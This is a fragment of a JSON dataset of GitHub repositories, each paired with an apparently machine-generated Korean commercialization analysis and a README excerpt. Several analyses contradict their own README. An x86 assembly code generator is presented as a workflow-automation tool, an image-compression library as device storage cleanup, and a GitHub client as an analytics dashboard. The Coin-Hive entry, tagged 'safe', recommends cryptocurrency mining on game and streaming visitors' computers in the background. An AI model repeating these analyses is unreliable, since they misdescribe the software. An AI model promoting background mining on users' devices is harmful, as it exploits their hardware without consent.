Analytics](https://analytics.google.com/analytics/web/)\n  - [Google Fonts](https://fonts.google.com/)\n ","composite_score":0.3174,"license_safety_tag":"safe"},{"name":"didi/DoraemonKit","github_url":"https://github.com/didi/DoraemonKit","stars":6,"language":"Java","license":"apache-2.0","abandonment_months":10,"description":"# DoraemonKit 상품화 분석\n\n## 왜 보물인가\n개발자들이 앱을 만들 때 필요한 편리한 도구 모음으로, 개발 시간을 크게 단축시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 앱 개발 회사들이 구독하여 개발 생산성 도구로 사용\n2. **내부 업무 도구**: 대형 IT 기업의 개발팀이 자체 앱 개발 시 필수 유틸리티로 도입","readme_excerpt":"- [简介](#简介)\n- [领域生态](#领域生态)\n- [使用手册](#使用手册)\n- [更新日志](#更新日志)\n- [社区活动](#社区活动)\n- [开发背景](#开发背景)\n- [功能模块](#功能模块)\n  - [一、平台工具(www.dokit.cn)](#一平台工具wwwdokitcn)\n  - [二、常用工具](#二常用工具)\n  - [三、性能检测](#三性能检测)\n  - [四、视觉工具](#四视觉工具)\n  - [五、Weex专项工具（CML专项工具）](#五weex专项工具cml专项工具)\n  - [六、支持自定义的业务工具集成到面板中](#六支持自定义的业务工具集成到面板中)\n  - [七、微信小程序专项工具](#七微信小程序专项工具)\n- [相关文档](#相关文档)\n- [微信交流群(一群满员，已开二群)](#一群满员，已开二群)\n- [QQ 交流群](#qq-交流群)\n- [微信公众号](#微信公众号)\n- [项目成员](#项目成员)\n- [使用提醒](#使用提醒)\n- [友情链接](#友情链接)\n- [协议](#协议)\n\n## 简介\n<div align=\"center\">    \n <img src=\"https://pt-starimg.didistatic.com/static/starimg/img/J0WO7tUi9U1616143930629.png\" width = \"250\"  alt=\"DoraemonKit\" align=left />\n <img src=\"https://img.shields.io/github/license/didi/DoraemonKit.svg\" align=left />\n <img src=\"https://img.shields.io/badge/Android-3.5.0-blue.svg\" align=left />\n <img src=\"https://img.shields.io/badge/iOS-3.0.7-yellow.svg\" align=left />\n <img src=\"https://img.shields.io/badge/Flutter-0.6.0-blue.svg\" align=left />\n <img src=\"https://img.shie","composite_score":0.3174,"license_safety_tag":"safe"},{"name":"0xADE1A1DE/AssemblyLine","github_url":"https://github.com/0xADE1A1DE/AssemblyLine","stars":10,"language":"Assembly","license":"Apache-2.0","abandonment_months":16,"description":"# AssemblyLine 상용화 분석 보고서\n\n## 왜 보물인가\n자동으로 복잡한 작업 흐름을 조직하고 관리해주는 시스템으로, 반복되는 업무를 수동으로 처리하는 기업들의 생산성을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n**1) SaaS 서비스:** 중소기업의 업무 자동화 플랫폼으로 제공하여 인사·회계·마케팅 등 반복 업무 자동 처리\n**2)","readme_excerpt":"# AssemblyLine\n![Unit Tests](https://github.com/0xADE1A1DE/AssemblyLine/actions/workflows/c-check.yml/badge.svg)\n![Code Style](https://github.com/0xADE1A1DE/AssemblyLine/actions/workflows/clang-format-check.yml/badge.svg)\n![Version](https://img.shields.io/github/v/release/0xADE1A1DE/AssemblyLine?logo=github&style=flat)\n![AUR Version](https://img.shields.io/aur/version/assemblyline-bin?logo=github&style=flat)\n\n\n\nAn ultra-lightweight C library and binary for generating machine code of x86\\_64 assembly language and executing on the fly without invoking another compiler, assembler or linker.\n\n* Easy to use C library `libassemblyline`.\n* Print or run assembly code with our cli tool `asmline` (see [tools/README.md](/tools/README.md)) \n* Support for MMX, SSE2, AVX, and AVX2 instruction sets.\n* Supports Scaled Index addressing mode (SIB) with the following syntax:  \n`[base + index*scale +\\- offset]`, `[base + scale*index +\\- offset]`  \n`[scale*index +\\- offset]`, `[constant]`\n* Supports pointe","composite_score":0.3171,"license_safety_tag":"safe"},{"name":"ptmt/react-native-macos","github_url":"https://github.com/ptmt/react-native-macos","stars":6,"language":"JavaScript","license":"mit","abandonment_months":28,"description":"# react-native-macos 평가 보고서\n\n## 왜 보물인가\nMac 컴퓨터에서 동작하는 모바일 앱을 한 번의 코드 작성으로 만들 수 있게 해주는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: Mac 사용자를 위한 데스크톱 협업 도구(프로젝트 관리, 메모 앱 등) 제공\n2. **내부 업무 도구**: 기업의 Mac 사용 직원들","readme_excerpt":"# Deprecation #\n\nThe project is no longer maintained.\n\nThere is an Microsoft version: [https://microsoft.github.io/react-native-windows/](https://microsoft.github.io/react-native-windows/)\n\nYou can run React Native on Catalyst [https://github.com/react-native-community/discussions-and-proposals/issues/131](https://github.com/react-native-community/discussions-and-proposals/issues/131)\n\n\n\n\n\n\n\n# React Native macOS (ex react-native-desktop)\n\nBuild macOS desktop applications using React Native.\n\n----\n\n[![Build Status](https://travis-ci.org/ptmt/react-native-macos.svg)](https://travis-ci.org/ptmt/react-native-macos) [![npm version](https://badge.fury.io/js/react-native-macos.svg)](https://badge.fury.io/js/react-native-macos) [![discord #react-native-platforms](https://img.shields.io/badge/reactiflux-%23react--native--platforms-blue.svg)](http://reactiflux.com)\n\n```jsx\n<View>\n  <Button onPress={() => alert('clicked!')} />\n</View>\n```\n\n## Getting Started\n\nNode 4.x+, OS X 10.11+ required.\n\n_Pr","composite_score":0.3169,"license_safety_tag":"safe"},{"name":"Fotoapparat/Fotoapparat","github_url":"https://github.com/Fotoapparat/Fotoapparat","stars":6,"language":"Kotlin","license":"apache-2.0","abandonment_months":31,"description":"# Fotoapparat 저장소 분석\n\n## 왜 보물인가\n휴대폰 카메라 기능을 앱에 쉽게 추가할 수 있는 도구로, 사진·영상 기반 앱 개발자들의 필수 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SNS 플랫폼 서비스**: 인스타그램 같은 사진 공유 앱이 실시간 카메라 필터와 촬영 기능을 더 빠르게 구현할 수 있습니다.\n2. **부동산 앱**: 매물 사","readme_excerpt":"# Fotoapparat\n\n![Build status](https://travis-ci.org/RedApparat/Fotoapparat.svg?branch=master)\n\n![ ](sample/src/main/res/mipmap-xxxhdpi/ic_launcher.png)\n\nCamera API in Android is hard. Having 2 different API for new and old Camera does not make things any easier. But fret not, that is your lucky day! After several years of working with Camera, we came up with Fotoapparat.\n\nWhat it provides:\n\n- Camera API which does not allow you to shoot yourself in the foot.\n- Simple yet powerful parameters customization.\n- Standalone custom `CameraView` which can be integrated into any `Activity`.\n- Fixes and workarounds for device-specific problems.\n- Both Kotlin and Java friendly configurations.\n- Last, but not least, non 0% test coverage.\n\nTaking picture becomes as simple as:\n\n```kotlin\nval fotoapparat = Fotoapparat(\n    context = this,\n    view = cameraView\n)\n\nfotoapparat.start()\n\nfotoapparat\n    .takePicture()\n    .saveToFile(someFile)\n```\n\n## How it works\n\n### Step One\n\nAdd `CameraView` to your","composite_score":0.3168,"license_safety_tag":"safe"},{"name":"stoneWeb/elm-react-native","github_url":"https://github.com/stoneWeb/elm-react-native","stars":5,"language":"JavaScript","license":"mit","abandonment_months":113,"description":"# elm-react-native 분석\n\n## 왜 보물인가\n스마트폰 앱을 한 번만 만들어서 iPhone과 Android 두 플랫폼에 동시에 배포할 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 스타트업이 모바일 앱 버전의 업무 관리 도구(예: 할일 관리, 팀 협업 앱)를 빠르게 출시할 때\n2. **내부 업무 도구**: 대기","readme_excerpt":"# elm-react-native\n\n![cover](screenshots/cover.png)\n\n[![React Native](https://img.shields.io/badge/react--native-v0.40.x-05A5D1.svg)](https://facebook.github.io/react-native)\n[![GitHub issues](https://img.shields.io/github/issues/stoneWeb/elm-react-native.svg)](https://github.com/stoneWeb/elm-react-native)\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](https://github.com/attentiveness/reading/pulls)\n[![MIT](https://img.shields.io/dub/l/vibe-d.svg)](http://opensource.org/licenses/MIT)\n\nThis is a high simulating eleme app [**(eleme website)**](https://www.ele.me/), implemented by [**React Native**](http://facebook.github.io/react-native/). This app can run on iOS and Android, the app has no use to any API, no data, it is a UI display App, the UI of the app has more than 95% in common with eleme app. This is a learning React Native process, it is a demo project.\n\nWelcome issues, PR, star.\n\n## App uses these dependencies\n- [react-native-blur](https://github.com/","composite_score":0.3167,"license_safety_tag":"safe"},{"name":"ElemeFE/vue-infinite-scroll","github_url":"https://github.com/ElemeFE/vue-infinite-scroll","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":31,"description":"# vue-infinite-scroll 상용화 분석\n\n## 왜 보물인가\n웹사이트에서 사용자가 스크롤할 때 자동으로 더 많은 콘텐츠를 불러오는 기능으로, 소셜미디어나 쇼핑몰 같은 현대적인 앱들이 반드시 필요로 하는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **전자상거래 플랫폼(SaaS)**: 상품 목록을 무한정 스크롤하며 구경할 수 있는 쇼핑몰 기","readme_excerpt":"# vue-infinite-scroll\n\nvue-infinite-scroll is an infinite scroll directive for vue.js.\n\n# Install\n\n```Bash\nnpm install vue-infinite-scroll --save\n```\n\n### CommonJS\n\nYou can use any build tool which supports `commonjs`:\n\n```JavaScript\n// register globally\nvar infiniteScroll =  require('vue-infinite-scroll');\nVue.use(infiniteScroll)\n\n// or for a single instance\nvar infiniteScroll = require('vue-infinite-scroll');\nnew Vue({\n  directives: {infiniteScroll}\n})\n\n```\n\nOr in ES2015:\n\n```JavaScript\n// register globally\nimport infiniteScroll from 'vue-infinite-scroll'\nVue.use(infiniteScroll)\n\n// or for a single instance\nimport infiniteScroll from 'vue-infinite-scroll'\nnew Vue({\n  directives: {infiniteScroll}\n})\n\n```\n\n### Direct include\n\nYou can use the CDN: https://unpkg.com/vue-infinite-scroll, `infiniteScroll` is exposed to `window` and will automatically install itself. Also you can use your local copy:\n\n```HTML\n<script src=\"../node_modules/vue-infinite-scroll/vue-infinite-scroll.js\"></script>","composite_score":0.3167,"license_safety_tag":"unknown"},{"name":"lambci/docker-lambda","github_url":"https://github.com/lambci/docker-lambda","stars":7,"language":"C#","license":"mit","abandonment_months":41,"description":"# lambci/docker-lambda 분석 보고서\n\n## 왜 보물인가\n클라우드 서비스를 개발할 때 실제 환경을 컴퓨터에서 미리 테스트할 수 있는 도구로, 비용 절감과 개발 속도 향상을 동시에 이룰 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **자동 업무 처리 플랫폼(SaaS)**: 특정 조건에서 자동으로 동작하는 업무(예: 야간 자동 보고서 생성)","readme_excerpt":"# Deprecated\n\nNB: these images are deprecated in favor of AWS' official images, which you can find at:\n\nhttps://github.com/aws/aws-lambda-base-images\n\nAnd browse on the ECR public gallery, eg:\n\nhttps://gallery.ecr.aws/lambda/python\n\nThis project is now archived and will not receive any further updates.\n\n# docker-lambda\n\nA sandboxed local environment that replicates the live [AWS Lambda](https://aws.amazon.com/lambda/)\nenvironment almost identically – including installed software and libraries,\nfile structure and permissions, environment variables, context objects and\nbehaviors – even the user and running process are the same.\n\n<img src=\"https://raw.githubusercontent.com/lambci/docker-lambda/master/examples/terminal3.png\" width=\"969\" alt=\"Example usage with java11 runtime\">\n\nYou can use it for [running your functions](#run-examples) in the same strict Lambda environment,\nknowing that they'll exhibit the same behavior when deployed live. You can\nalso use it to [compile native dependencie","composite_score":0.3166,"license_safety_tag":"safe"},{"name":"nanchen2251/CompressHelper","github_url":"https://github.com/nanchen2251/CompressHelper","stars":9,"language":"Java","license":"unknown","abandonment_months":88,"description":"# CompressHelper 상품화 분석\n\n## 왜 보물인가\n스마트폰과 컴퓨터의 용량을 자동으로 정리해주는 기술로, 저장 공간 부족으로 고민하는 수백만 사용자의 문제를 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 스토리지 서비스**: Google Drive, Dropbox 같은 클라우드 저장소에서 사진·동영상 자동 압축 기능으로 업그","readme_excerpt":"# AiYaCompressHelper\n压缩，图片压缩，压缩Bitmap，Compress,CompressImage,CompressFile,CompressBitmap<br><br>\n\n主要通过尺寸压缩和质量压缩，以达到清晰度最优，该项目参考了 [https://github.com/zetbaitsu/Compressor](https://github.com/zetbaitsu/Compressor) 的部分代码，且在基础上修正了部分 bug\n\n\n\n## 效果图<br>\n![](https://github.com/nanchen2251/CompressHelper/blob/master/111.png)\n\n#### ⊙开源不易，希望给个 star 或者 fork 奖励\n#### ⊙拥抱开源：https://github.com/nanchen2251/\n#### ⊙交流群（拒绝无脑问）：118116509 <a target=\"_blank\" href=\"//shang.qq.com/wpa/qunwpa?idkey=e6ad4af66393684e1d0c9441403b049d2d5670ec0ce9f72150e694cbb7c16b0a\"><img border=\"0\" src=\"http://pub.idqqimg.com/wpa/images/group.png\" alt=\"Android神技侧漏交流群\" title=\"Android神技侧漏交流群\"></a>( 点击图标即可加入 )<br>\n\n## 特点\n  1、支持压缩单张图片和多张图片<br>\n## 使用方法\n#### 1、添加依赖<br>\n##### Step 1. Add it in your root build.gradle at the end of repositories:\n```java\nallprojects {\n\t\trepositories {\n\t\t\t...\n\t\t\tmaven { url 'https://jitpack.io' }\n\t\t}\n\t}\n```\n##### Step 2. Add the dependency\n```java\ndependencies {\n\t        implementation 'com.github.nanchen2251","composite_score":0.3166,"license_safety_tag":"unknown"},{"name":"MoeClub/OneList","github_url":"https://github.com/MoeClub/OneList","stars":10,"language":"HTML","license":"unknown","abandonment_months":74,"description":"","readme_excerpt":"# 开始使用 (测试版,更新中...)\n## Python3版本Bug较多,功能不全. 推荐使用 [Written in GoLang](https://github.com/MoeClub/OneList/tree/master/Rewrite) 版本\n\n## 所需依赖\n```\n# 自行安装 python3\npip3 install tornado\n```\n\n## 通过下面URL登录 (右键新标签打开)\n[https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=78d4dc35-7e46-42c6-9023-2d39314433a5&response_type=code&redirect_uri=http://localhost/onedrive-login&response_mode=query&scope=offline_access%20User.Read%20Files.ReadWrite.All](https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=78d4dc35-7e46-42c6-9023-2d39314433a5&response_type=code&redirect_uri=http://localhost/onedrive-login&response_mode=query&scope=offline_access%20User.Read%20Files.ReadWrite.All)\n\n## 初始化配置文件\n```\n# 运行\npython3 OneList.py\n\n# 在浏览器地址栏中获取 code 字段内容\n# 粘贴并按回车, 每个 code 只能用一次\n# 此操作将会自动初始化的配置文件\n```\n\n## 自定义配置文件\n```\n# config.json\n\n{\n    // OneDrive 中的某个需要列出的目录\n    \"RootPath\": \"/Document\",\n    // 网址中的子路径\n    \"SubPath\": \"/onedrive\",\n    // 目录刷新时间\n    \"FolderRefresh\": 900,\n    // 下载链接","composite_score":0.3164,"license_safety_tag":"unknown"},{"name":"gxvv/ex-baiduyunpan","github_url":"https://github.com/gxvv/ex-baiduyunpan","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":87,"description":"# 바이두 클라우드 다운로더 (gxvv/ex-baiduyunpan) 분석\n\n## 왜 보물인가\n중국 최대 클라우드 저장소인 바이두에서 파일을 쉽게 내려받을 수 있는 도구로, 해외 사용자들이 중국 내 자료에 접근하는 가장 큰 장벽을 제거합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹 기반 바이두 파일 일괄 다운로드 플랫폼 (월 구독으로 용량","readme_excerpt":"# EX-百度云盘\n![TamperMonkey v4.5](https://img.shields.io/badge/TamperMonkey-v4.5-brightgreen.svg)\n![Chrome x64 v60.4](https://img.shields.io/badge/Chrome%20x64-v60.4-brightgreen.svg)\n![Safari v11.0.3](https://img.shields.io/badge/Safari%20-v11.0.3-brightgreen.svg)\n\n如有问题欢迎提交Issue，欢迎交流讨论。:star2:\n## ⚠️注意\n因时间有限，仅对最新版Chrome和Safari浏览器下TamperMonkey提供支持。不会增加额外非必要的功能。\n\n本脚本仅提供了获取下载链接的功能，下载速度过慢/第三方下载工具不能下载/链接超时/压缩包不能解压等问题与脚本无关。\n\n## 功能\n- 解除大文件下载限制\n- 支持文件夹下载\n- 支持多文件下载\n- 支持批量复制下载链接\n- 支持百度网盘和百度企业网盘\n\n## License\nThe MIT License (MIT)\nCopyright © 2017 [gxvv](https://github.com/gxvv)\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the “Software”), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following condition","composite_score":0.3164,"license_safety_tag":"unknown"},{"name":"msracver/FCIS","github_url":"https://github.com/msracver/FCIS","stars":6,"language":"Cuda","license":"mit","abandonment_months":57,"description":"# FCIS 저장소 분석\n\n## 왜 보물인가\n사진 속 물체의 윤곽을 자동으로 인식하는 기술로, 전자상거래·의료·자동차 산업에서 수작업을 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 온라인 쇼핑몰용 상품 이미지 자동 배경 제거 및 윤곽 정보 제공\n- **내부 업무 도구**: 의료 영상 분석 시스템에서 종양·장기 등의 정확한 경계","readme_excerpt":"## Fully Convolutional Instance-aware Semantic Segmentation\n\nThe major contributors of this repository include [Haozhi Qi](https://github.com/Oh233), [Yi Li](https://github.com/liyi14), [Guodong Zhang](https://github.com/gd-zhang), [Haochen Zhang](https://github.com/Braininvat), [Jifeng Dai](https://github.com/daijifeng001), and [Yichen Wei](https://github.com/YichenWei).\n\n### Introduction\n\n**FCIS** is a fully convolutional end-to-end solution for instance segmentation, which won the first place in COCO segmentation challenge 2016. \n\nFCIS is initially described in a [CVPR 2017 spotlight paper](https://arxiv.org/abs/1611.07709). It is worth noticing that:\n* FCIS provides a simple, fast and accurate framework for instance segmentation.\n* Different from [MNC](https://github.com/daijifeng001/MNC), FCIS performs instance mask estimation and categorization jointly and simultanously, and estimates class-specific masks.\n* We did not exploit the various techniques & tricks in the Mask RCNN syst","composite_score":0.3164,"license_safety_tag":"safe"},{"name":"natanielruiz/deep-head-pose","github_url":"https://github.com/natanielruiz/deep-head-pose","stars":56,"language":"Python","license":"NOASSERTION","abandonment_months":37,"description":"# deep-head-pose 보물 분석\n\n## 왜 보물인가\n사진이나 영상에서 사람의 머리 방향을 자동으로 인식하는 AI 기술로, 실시간 얼굴 추적이 필요한 다양한 산업에 즉시 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **화상 회의 플랫폼의 눈 맞춤 보정**: 줌이나 팀스 같은 서비스에 적용하여 화면을 보고 있어도 상대방과 눈 맞춤처럼 보이도","readme_excerpt":"# Hopenet #\n\n<div align=\"center\">\n  <img src=\"https://i.imgur.com/K7jhHOg.png\" width=\"380\"><br><br>\n</div>\n\n**Hopenet** is an accurate and easy to use head pose estimation network. Models have been trained on the 300W-LP dataset and have been tested on real data with good qualitative performance.\n\nFor details about the method and quantitative results please check the CVPR Workshop [paper](https://arxiv.org/abs/1710.00925).\n\n<div align=\"center\">\n<img src=\"conan-cruise.gif\" /><br><br>\n</div>\n\n**new** [GoT trailer example video](https://youtu.be/OZdOrSLBQmI)\n\n**new** [Conan-Cruise-Car example video](https://youtu.be/Bz6eF4Nl1O8)\n\n\nTo use please install [PyTorch](http://pytorch.org/) and [OpenCV](https://opencv.org/) (for video) - I believe that's all you need apart from usual libraries such as numpy. You need a GPU to run Hopenet (for now).\n\nTo test on a video using dlib face detections (center of head will be jumpy):\n```bash\npython code/test_on_video_dlib.py --snapshot PATH_OF_SNAPSHOT -","composite_score":0.316,"license_safety_tag":"unknown"},{"name":"cazala/coin-hive","github_url":"https://github.com/cazala/coin-hive","stars":12,"language":"JavaScript","license":"mit","abandonment_months":91,"description":"# Coin-Hive 저장소 분석\n\n## 왜 보물인가\n웹사이트 방문자의 컴퓨터 성능을 이용해 자동으로 암호화폐를 채굴할 수 있는 기술로, 광고 없이 수익을 만드는 새로운 방식입니다.\n\n## 어디에 쓸 수 있나\n- **온라인 게임 플랫폼**: 게임 이용 중 백그라운드에서 자동 채굴하여 게임사 수익화\n- **무료 스트리밍 서비스**: 광고 대신 채굴로 수익을 ","readme_excerpt":"# CoinHive [![Build Status](https://travis-ci.org/cazala/coin-hive.svg?branch=master)](https://travis-ci.org/cazala/coin-hive)\n\nMine cryptocurrencies [Monero (XMR)](https://getmonero.org/) and [Electroneum (ETN)](http://electroneum.com/) using [CoinHive](https://coinhive.com/) from node.js\n\n**New:** Now you can [run this miner on any stratum based pool](https://github.com/cazala/coin-hive#faq).\n\n**New 2:** Now you can [mine Electroneum (ETN)](https://github.com/cazala/coin-hive#can-i-mine-other-cryptocurrency-than-monero-xmr).\n\n**Need a proxy?** check [coin-hive-stratum](https://github.com/cazala/coin-hive-stratum).\n\n## Install\n\n```\nnpm install -g coin-hive\n```\n\n## Usage\n\n```js\nconst CoinHive = require('coin-hive');\n\n(async () => {\n  // Create miner\n  const miner = await CoinHive('ZM4gjqQ0jh0jbZ3tZDByOXAjyotDbo00'); // CoinHive's Site Key\n\n  // Start miner\n  await miner.start();\n\n  // Listen on events\n  miner.on('found', () => console.log('Found!'));\n  miner.on('accepted', () => consol","composite_score":0.316,"license_safety_tag":"safe"},{"name":"gitpoint/git-point","github_url":"https://github.com/gitpoint/git-point","stars":5,"language":"JavaScript","license":"mit","abandonment_months":23,"description":"# Git Point 저장소 분석\n\n## 왜 보물인가\n깃허브(GitHub)에서 자신의 코드 활동 현황을 한눈에 보고 분석할 수 있는 도구로, 개발자의 업무 성과를 시각화합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자 성과 관리 대시보드 - 팀 리더가 팀원들의 코딩 활동을 모니터링하는 구독형 서비스\n2. **내부 업무 도구**: 소프","readme_excerpt":"<h1 align=\"center\"> GitPoint </h1> <br>\n<p align=\"center\">\n  <a href=\"https://gitpoint.co/\">\n    <img alt=\"GitPoint\" title=\"GitPoint\" src=\"http://i.imgur.com/VShxJHs.png\" width=\"450\">\n  </a>\n</p>\n\n<p align=\"center\">\n  GitHub in your pocket. Built with React Native.\n</p>\n\n<p align=\"center\">\n  <a href=\"https://itunes.apple.com/us/app/gitpoint/id1251245162?mt=8\">\n    <img alt=\"Download on the App Store\" title=\"App Store\" src=\"http://i.imgur.com/0n2zqHD.png\" width=\"140\">\n  </a>\n\n  <a href=\"https://play.google.com/store/apps/details?id=com.gitpoint\">\n    <img alt=\"Get it on Google Play\" title=\"Google Play\" src=\"http://i.imgur.com/mtGRPuM.png\" width=\"140\">\n  </a>\n</p>\n\n<!-- START doctoc generated TOC please keep comment here to allow auto update -->\n<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->\n## Table of Contents\n\n- [Introduction](#introduction)\n- [Features](#features)\n- [Feedback](#feedback)\n- [Contributors](#contributors)\n- [Build Process](#build-process)\n- [Backers](","composite_score":0.3159,"license_safety_tag":"safe"},{"name":"mcxtzhang/ZLayoutManager","github_url":"https://github.com/mcxtzhang/ZLayoutManager","stars":5,"language":"Java","license":"unknown","abandonment_months":36,"description":"# ZLayoutManager 기술 가치 분석\n\n## 왜 보물인가\n안드로이드 앱에서 화면 레이아웃을 자유롭게 배치할 수 있는 개발 도구로, 복잡한 UI 작업을 단순하게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업용 노코드 앱 빌더 플랫폼에서 사용자가 드래그앤드롭으로 앱 화면을 만들 때 기술 기반으로 활용\n2. **내부 업무","readme_excerpt":"# LayoutManagerDemo\n[![](https://jitpack.io/v/mcxtzhang/LayoutManagerDemo.svg)](https://jitpack.io/#mcxtzhang/LayoutManagerDemo)\n\n利用自定义LayoutManager 的一些实战实例。\n\n\n相关博文：\n\n[流式布局](http://blog.csdn.net/zxt0601/article/details/52956504)\n\n[仿探探、人人影视 卡片层叠 炫动滑动布局](http://blog.csdn.net/zxt0601/article/details/52956504)\n\n\n想经济上支持我 or 想通过视频看我是怎么实现的:\n\nhttp://edu.csdn.net/course/detail/3956\n\n\nIf you like, point a star .Thank you very much!\n\n喜欢随手点个star 多谢\n\n##  在哪里找到我：\n\n我的github：\n\nhttps://github.com/mcxtzhang\n\n我的CSDN博客：\n\nhttp://blog.csdn.net/zxt0601\n\n我的稀土掘金：\n\nhttp://gold.xitu.io/user/56de210b816dfa0052e66495\n\n我的简书：\n\nhttp://www.jianshu.com/users/8e91ff99b072/timeline\n***\n\n\n# 效果一览：\n\n\n[仿探探、人人影视 卡片层叠 炫动滑动布局](http://blog.csdn.net/zxt0601/article/details/52956504)\n\n探探皇帝翻牌子即视感\n\n![探探皇帝翻牌子即视感](https://github.com/mcxtzhang/LayoutManagerDemo/blob/master/gifs/tantan.gif)\n\n人人美剧订阅界面\n\n![人人美剧订阅界面](https://github.com/mcxtzhang/LayoutManagerDemo/blob/master/gifs/renren.gif)\n\n可配置参数(同时显示6页)：\n\n![人人美剧订阅界面](https://github.com/m","composite_score":0.3158,"license_safety_tag":"unknown"},{"name":"bizz84/SwiftyStoreKit","github_url":"https://github.com/bizz84/SwiftyStoreKit","stars":5,"language":"Swift","license":"mit","abandonment_months":23,"description":"# SwiftyStoreKit 분석 보고서\n\n## 왜 보물인가\n애플 기기에서 앱 구매 기능을 간편하게 구현할 수 있는 도구로, 개발자들이 매출 기능을 빠르게 추가할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **게임·앱 개발사**: 유료 아이템, 구독권, 프리미엄 기능 판매 시스템 구축\n2. **SaaS 서비스**: iOS 앱 내에서 월간 구독 결","readme_excerpt":"<img src=\"https://github.com/bizz84/SwiftyStoreKit/raw/master/SwiftyStoreKit-logo.png\" width=100%>\n\n[![License](https://img.shields.io/badge/license-MIT-blue.svg?style=flat)](http://mit-license.org)\n[![Platform](http://img.shields.io/badge/platform-iOS%20%7C%20macOS%20%7C%20tvOS%20%7C%20watchOS-lightgrey.svg?style=flat)](https://developer.apple.com/resources/)\n[![Language](https://img.shields.io/badge/swift-5.0-orange.svg)](https://developer.apple.com/swift)\n[![Build](https://img.shields.io/travis/bizz84/SwiftyStoreKit.svg?style=flat)](https://travis-ci.org/bizz84/SwiftyStoreKit)\n[![Issues](https://img.shields.io/github/issues/bizz84/SwiftyStoreKit.svg?style=flat)](https://github.com/bizz84/SwiftyStoreKit/issues)\n[![Slack](https://img.shields.io/badge/Slack-Join-green.svg?style=flat)](https://join.slack.com/t/swiftystorekit/shared_invite/enQtODY3OTYxOTExMzE5LWVkNGY4MzcwY2VjNGM4MGU4NDFhMGE5YmUxMGM3ZTQ4NjVjNTRkNTJhNDAyMWZmY2M5OWE5MDE0ODc3OGJjMmM)\n\nSwiftyStoreKit is a lightweight In App P","composite_score":0.3155,"license_safety_tag":"safe"},{"name":"deepmind/trfl","github_url":"https://github.com/deepmind/trfl","stars":7,"language":"Python","license":"apache-2.0","abandonment_months":42,"description":"# deepmind/trfl 분석\n\n## 왜 보물인가\nDeepMind가 만든 강화학습 알고리즘 모음집으로, 복잡한 의사결정 문제를 자동으로 해결하는 AI 시스템을 만들 때 필요한 핵심 도구들입니다.\n\n## 어디에 쓸 수 있나\n1. **로봇 제어 SaaS**: 공장의 로봇팔이 최적의 움직임을 자동으로 학습하도록 하는 클라우드 서비스\n2. **게임 AI 내부 ","readme_excerpt":"# TRFL\n\nTRFL (pronounced \"truffle\") is a library built on top of TensorFlow that exposes\nseveral useful building blocks for implementing Reinforcement Learning agents.\n\n\n## Installation\n\nTRFL can be installed from pip with the following command:\n`pip install trfl`\n\nTRFL will work with both the CPU and GPU version of tensorflow, but to allow\nfor that it does not list Tensorflow as a requirement, so you need to install\nTensorflow and Tensorflow-probability separately if you haven't already done so.\n\n## Usage Example\n\n```python\nimport tensorflow as tf\nimport trfl\n\n# Q-values for the previous and next timesteps, shape [batch_size, num_actions].\nq_tm1 = tf.get_variable(\n    \"q_tm1\", initializer=[[1., 1., 0.], [1., 2., 0.]], dtype=tf.float32)\nq_t = tf.get_variable(\n    \"q_t\", initializer=[[0., 1., 0.], [1., 2., 0.]], dtype=tf.float32)\n\n# Action indices, discounts and rewards, shape [batch_size].\na_tm1 = tf.constant([0, 1], dtype=tf.int32)\nr_t = tf.constant([1, 1], dtype=tf.float32)\npcont_t =","composite_score":0.3155,"license_safety_tag":"safe"},{"name":"monklof/Back-End-Developer-Interview-Questions","github_url":"https://github.com/monklof/Back-End-Developer-Interview-Questions","stars":5,"language":"","license":"gpl-2.0","abandonment_months":40,"description":"# Back-End-Developer-Interview-Questions 분석\n\n## 왜 보물인가\n개발자 채용을 담당하는 인사팀이나 면접관들이 기술자 심사를 할 때 사용할 수 있는 표준화된 질문 데이터베이스입니다.\n\n## 어디에 쓸 수 있나\n\n1. **채용 플랫폼 SaaS**: 회사들이 개발자 채용 시 공정하고 일관된 기술 면접을 진행하도록 돕는 구독형 온","readme_excerpt":"后端开发面试题\n================\n\n## 说明\n\n这篇文章翻译自一位外国友人的关于面试后端程序员的文章，我比较喜爱这篇文章。一是因为它极大的拓宽了我的视角，另一方面是其中的一些问题非常具有启发性。不仅对于面试者，对于面试官来说也是个不错的参考。于是迫不及待的翻译了一下，给各位看官做个参考。\n\n这篇文章中，许多问题我并没有完全理解，所以翻译可能存在不准确的地方。如果有读者发现有一些翻译有误或者不好的地方，请不吝赐教。\n\n原文参见 [@arialdomartini](https://github.com/arialdomartini)的: [Back-End Developer Interview Questions](https://github.com/arialdomartini/Back-End-Developer-Interview-Questions)\n\n以下是原文翻译。\n\n后端开发面试题\n================\n\n在面试的时候，我并不特别喜欢问一些技术性的问题。我更喜欢的方式是这样的: 